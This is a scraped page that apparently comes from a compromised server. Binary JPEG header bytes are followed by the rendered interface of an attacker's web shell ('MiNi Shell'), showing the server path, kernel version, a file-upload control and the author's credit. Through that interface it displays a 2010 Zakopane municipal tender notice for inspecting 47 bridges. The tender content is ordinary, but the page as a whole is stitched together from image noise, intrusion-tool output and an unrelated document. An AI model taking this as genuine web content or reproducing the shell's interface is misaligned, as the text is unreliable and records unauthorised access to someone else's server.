JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100625/184232-N-2010.html

<p class="kh_header"><b>Zakopane: ZP/341/72/10wykonanie podstawowego i rozszerzonego przegladu  obiektow mostowych</b><br>
<b>Numer ogłoszenia: 184232 - 2010; data zamieszczenia: 25.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/341/72/10wykonanie podstawowego i rozszerzonego przegladu  obiektow mostowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> wykonanie podstawowego i rozszerzonego przeglądu okresowego wraz z oceną stanu technicznego  i przydatności  do użytkowania oraz założenie książek obiektów mostowych położonych na terenie Gminy Miasta Zakopane w ciągu dróg publicznych gminnych, dla których zarządca jest Burmistrz Gminy Miasta Zakopane

Zakres zamówienia  obejmuje przeprowadzenie  podstawowej i rozszerzonej  okresowej kontroli pięcioletniej   obiektów mostowych  na terenie Zakopanego w tym: 
1.	Przeprowadzenie przeglądu  podstawowego i rozszerzonego z wykonaniem oceny stanu technicznego, dokumentacji fotograficznej, założeniem książek obiektów mostowych dla  obiektów wymienionych poniżej  ( z wyłączeniem mostów dla których już założono książki obiektów)
2.	Sporządzenie protokołów przeglądów zgodnych z aktualnie obowiązującymi przepisami.
3.	Oględziny obiektu mostowego i jego otoczenia, sprawdzenie i ocenę aktualnego stanu  technicznego elementów obiektu, wykonanie podstawowych badań i pomiarów oraz dokumentacji fotograficznej obiektu i jego uszkodzeń, sporządzenie odpowiednich protokołów z przeglądu(wg obowiązującego wzoru) wraz z częścią opisową zawierająca wnioski i zalecenia, określenie przydatności obiektu do  użytkowania, warunków bezpiecznej eksploatacji, potrzeb i zakresu niezbędnych robót bieżącego utrzymania oraz remontów- opracowanie należy wykonać w 2 egzemplarzach oraz w formie elektronicznej 

 Zamówienie   obejmuje następujące obiekty mostowe: 

Wykaz obiektów mostowych na terenie Gminy Miasto Zakopane podlegających okresowemu przeglądowi technicznemu


L.p.
	
Nr obiektu mostowego 1)	
Kilometraż potoku
	
Nazwa cieku	
Rodzaj	
W ciągu drogi
(określenie z dec. GDDKiA)
1	brak 	20+230	Cicha Woda (Z)	most	K 420170 - ul.Harenda
2	JNI 01026592  	21+300	Cicha Woda (Z)	most	K 420189 - ul.Króle
3	JNI 01026593  	23+120	Cicha Woda (Z)	most	K 420236 - ul.Szpitalna
4	JNI 01026594  	24+050	Cicha Woda (Z)	most	K 420239 - ul.Tatary
5	JNI 01026595  	24+630	Cicha Woda (Z)	most	K 420127 - ul.Bilinówka
6	JNI 01026596  	24+910	Cicha Woda (Z)	most	K 420247 - ul.Walowa Góra
7	JNI 01026597  	25+100	Cicha Woda	most	K 420200 - ul.Na Gubałówkę
8	JNI 01026598 	25+325	Cicha Woda	most	K 420183 - ul.Kaszelewskiego 
9	JNI 01026599	26+230	Cicha Woda	most	K 420244 - ul.Droga Na Ubocz 
10	JNI 01026600	26+730	Cicha Woda	most	K 420158 - ul.Droga Na Szymoszkową
11	JNI 01026601	29+400	Cicha Woda	most	K 420264 - ul.J.Krzeptowskiego
12	JNI 01026602	0+055	Olczyski	most	K 420245 - ul.Ustup
13	JNI 01026603	0+760	Olczyski	most	K 420150 - ul.Droga Do Olczy
14	JNI 01026604	1+740	Olczyski	most	K 420176 - ul.Janosówka
15	JNI 01026605	2+270	Olczyski	most	K 420150 - ul.Droga Do Olczy
16	JNI 01026606	2+880	Olczyski	most	K 420164 - ul.Gawlaki
17	JNI 01026607	3+300	Olczyski	most	K 420173 - ul.Huty
18	JNI 01026608	4+810	Olczyski	most	K 420137 - ul.Chłabówka Dolna
19		0+015	Kadukowski	most	K 420173 - ul.Huty
20		0+180	Mrowcowiański	most	K 420184 - ul.Klusie (420199 ul.Mrowce)
21	JNI 01026584 	0+170	Bystra	most	K 420179 - ul.Kamieniec
22	JNI 01026585	0+660	Bystra	most	K 420165 - ul.Gimnazjalna
23		0+920	Bystra	most	K 420186 - ul.Kościuszki 
24	JNI 01026586 	1+780	Bystra	most	K 420174 - ul.Jagiellońska 
25	JNI 01026587 	2+230	Bystra	most	K 420145 - ul.Do Bristolu
26	JNI 01026588	2+550	Bystra	most	K 420135 - ul.Chałubińskiego (DW Bankowiec)
27	JNI 01026589 	2+960	Bystra	most	K 420155 - ul.Droga Na Bystre
28	JNI 01026590 	3+480	Bystra	most	K 420181 - ul.Karłowicza
28	JNI 01026611	0+560	Czarny	most	K 420240 - ul.Tetmajera
30	brak	0+160	Młyniska	most	
31	brak	0+255	Młyniska	most	
32	JNI 01026614	0+910	Młyniska	most	K 420206 - ul.Orkana 
33	JNI 01026615	1+270	Młyniska	most	K 420195 - ul.Małe Żywczańskie
34	JNI 01026616	1+130	Młyniska	most	K 420182 - ul.Kasprusie
35	JNI 01026617	1+580	Młyniska	most	K 420153 -  ul.Droga do Wantuli
36	JNI 01026618	2+160	Młyniska	most	K 420232 -  ul.Strążyska
37	brak	1+470	Biały	most	K 420234 - ul.Andrzeja Struga
38	JNI 01026619	0+390	Za Bramką	most	K 420156 - ul.Droga Na Buńdówki
39	JNI 01026620	0+880	Krzeptowianka	most	K 420191 - ul.Stare Krzeptówki
40	brak	brak	Foluszowy	most	K 420181 - ul.Karłowicza
41	brak 	brak	Foluszowy	most	K 420220 - ul.Sabały
42	brak 	brak	Foluszowy	most	K 420193 - ul.Makuszyńskiego
43	brak 	brak	Foluszowy	most	K 420240 -ul.Tetmajera
44	brak 	brak	Foluszowy	most	K 420230 - ul.Staszica
45	brak 	brak	Foluszowy	most	K 420163 - ul.Gen.A.Galicy
46	brak 	brak	Foluszowy	most	Między ul.Krupówki a Muzeum Tatrz.
47	brak 	brak	Foluszowy	most	Między ul.Krupówki a ZSB

Przeglądy 5 letnie zostały wykonane dla poz:

Nr 15.  JNI 01026605 droga 420150K (Droga do Olczy) 	- pot. Olczyski, 	należy wykonać tylko KOM 
Nr 35.  JNI 01026617 droga 420153K (Droga do Wantuli) 	- pot. Młyniska,  należy wykonać tylko KOM

Książki obiektu mostowego posiadają obiekty z poz.:

Nr 6. JNI 01026596 droga 420247K (Walowa Góra)  	- pot. Cicha Woda, należy wykonać tylko przeglądy i protokoły
Nr 21. JNI 01026584 droga 420179K (Kamieniec)       	- pot. Bystra, należy wykonać tylko przeglądy i protokoły
Nr 22. JNI 01026585 droga 420165K (Gimnazjalna)    	- pot. Bystra, należy wykonać tylko przeglądy i protokoły
Nr 24. JNI 01026586 droga 420174K (Jagiellońska)     	-pot. Bystra, należy wykonać tylko przeglądy i protokoły.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.31.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium przetargowego</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże , że w ciągu ostatnich 3 lat przed upływem terminu składania ofert  a jeżeli okres prowadzenia działalności jest krótszy w tym okresie  wykonał  przeglądy   podstawowe i rozszerzone    co najmniej 5 obiektów  mostowych. 
  
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca wykaże  ,że dysponuje lub będzie dysponował :
- co najmniej jedną osobą  posiadającą uprawnienia  budowlane w specjalności mostowej i legitymującą się aktualną przynależnością do właściwej izby  inżynierów budownictwa.

,
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art.144 ust.1 ustawy zamawiający informuje, że  dopuszcza dokonanie zmian zawartej umowy w przypadku jeżeli konieczność wprowadzenia zmian wynika z okoliczności których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany są korzystne dla zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamowienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydzial Drogownictwa i Transportu pok. 216  
Urzad Miasta Zakopane 
ul. Kosciuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.07.2010 godzina 12:00, miejsce: Biuro ds zamówien publicznych pok. 8 
Urzad Miasta Zakopane 
ul. Kosciuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com